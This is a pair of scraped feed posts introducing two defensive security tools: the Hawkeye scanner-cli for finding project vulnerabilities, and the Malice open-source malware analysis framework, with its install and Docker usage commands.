The Hawkeye scanner-cli is a project security, vulnerability and general risk highlighting tool. It is meant to be integrated into your pre-commit hooks and your pipelines.Running and configuring the scannerThe Hawkeye scanner-cli assumes that your directory structure is such that it keeps the toolchain’s files on top level. Roughly, this is what it boils down to:Node.js projects have a package.json on top levelRuby projects will have a Gemfile on top levelPython projects will have a requirements.txt on top levelPHP projects will have a composer.lock on top levelJava projects will have a build (gradle) or target (maven) folder, and include .java and .jar filesThis is not exhaustive as sometimes tools require further files to exist. To understand how the modules decide whether they can handle a project, please check the How it works section and the modules folder.Docker (recommended)The docker image is hands-down the easiest way to the scanner. Please note that your project root (e.g. $PWD) needs to be mounted to /target.docker run –rm -v $PWD:/target hawkeyesec/scanner-cliThe docker build is also the recommended way to run the scanner in your CI pipelines. This is an example of running Hawkeye against one of your projects in GoCD:

Link: http://feedproxy.google.com/~r/PentestTools/~3/JoL8_BBnrhQ/scanner-cli-project-securityvulnerabili.html

Malice – VirusTotal Wanna Be (Now With 100% More Hipster)

Malice’s mission is to be a free open source version of VirusTotal that anyone can use at any scale from an independent researcher to a fortune 500 company.Try It OutDEMO: demo.malice.iousername: malicepassword: ecilamRequirementsHardware~16GB disk space~4GB RAMSoftwareDockerGetting Started (OSX)Install$ brew install maliceio/tap/maliceUsage: malice [OPTIONS] COMMAND [arg…]Open Source Malware Analysis FrameworkVersion: 0.3.11Author: blacktop – Options: –debug, -D Enable debug mode [$MALICE_DEBUG] –help, -h show help –version, -v print the versionCommands: scan Scan a file watch Watch a folder lookup Look up a file hash elk Start an ELK docker container plugin List, Install or Remove Plugins help Shows a list of commands or help for one commandRun ‘malice COMMAND –help’ for more information on a command.Scan some malware$ malice scan evil.malwareNOTE: On the first run malice will download all of it’s default plugins which can take a while to complete.Malice will output the results as a markdown table that can be piped or copied into a results.md that will look great on Github see hereStart Malice’s Web UI$ malice elkYou can open the Kibana UI and look at the scan results here: http://localhost (assuming you are using Docker for Mac)Type in malice as the Index name or pattern and click Create. Now click on the Malice Tab and behold!!! Getting Started (Docker in Docker)Install/Update all Pluginsdocker run –rm -v /var/run/docker.sock:/var/run/docker.sock malice/engine plugin update –allScan a filedocker run –rm -v /var/run/docker.sock:/var/run/docker.sock \ -v `pwd`:/malice/samples \ -e MALICE_VT_API=$MALICE_VT_API \ malice/engine scan SAMPLEDocumentationDocumentationPluginsExamplesRoadmapContributingDownload Malice

Link: http://feedproxy.google.com/~r/PentestTools/~3/MYaRxSE3IIE/malice-virustotal-wanna-be-now-with-100.html